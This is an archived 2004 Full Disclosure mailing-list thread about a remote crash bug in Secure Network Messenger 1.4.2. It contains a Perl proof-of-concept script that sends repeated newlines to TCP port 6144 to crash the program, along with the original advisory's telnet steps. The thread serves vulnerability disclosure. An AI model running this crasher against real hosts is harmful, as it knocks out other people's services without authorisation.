Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Crash in Secure Network Messenger 1.4.2
From: "r`Futile" <clearscreen () lycantrope com>
Date: Sat, 13 Nov 2004 23:54:54 +0100

And here is my proof of concept:

#!/usr/bin/perl

use IO::Socket;
print ("\nSecure Network Messenger Crasher by ClearScreen\n");
print ("\nEnter host to crash: ");
$h = <STDIN>;
chomp $h;
$socks = IO::Socket::INET->new(
       Proto => "tcp",
       PeerPort => "6144",
       PeerAddr => "$h"
) or die "\nNo response from host.";

sleep 1;
print "\nSuccesfully connected to $h!\n";
for ($count=1; $count<15; $count++)
{
print $socks "\n";
select(undef, undef, undef, 0.1);
}
print "\nMessenger crashed.";
close $socks;

Greetz, clearscreen :)


----- Original Message ----- From: "Luigi Auriemma" <aluigi () autistici org> To: <bugtraq () securityfocus com>; <bugs () securitytracker com>; <news () securiteam com>; <full-disclosure () lists netsys com>; <vuln () secunia com>
Sent: Friday, November 12, 2004 9:52 PM
Subject: Crash in Secure Network Messenger 1.4.2



#######################################################################

                            Luigi Auriemma

Application:  Secure Network Messenger
             http://www.networkmessengers.com/msg/
Versions:     <= 1.4.2
Platforms:    Windows
Bug:          crash
Exploitation: remote
Date:         12 November 2004
Author:       Luigi Auriemma
             e-mail: aluigi () altervista org
             web:    http://aluigi.altervista.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Secure Network Messenger is a LAN messenger for Windows for exchanging
encrypted messages and files.


#######################################################################

======
2) Bug
======


Is possible to crash the program sending malformed data.


#######################################################################

===========
3) The Code
===========


Launch a telnet client and connect to the victim host on port 6144.
Now press RETURN about 10 times or more.
Disconnect, reconnect again and press RETURN.
The remote host should be crashed.


#######################################################################

======
4) Fix
======


No fix.
Over one month ago the developers said that they had to fix this bug
soon... no patch has been released yet.


#######################################################################


--- Luigi Auriemma
http://aluigi.altervista.org


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault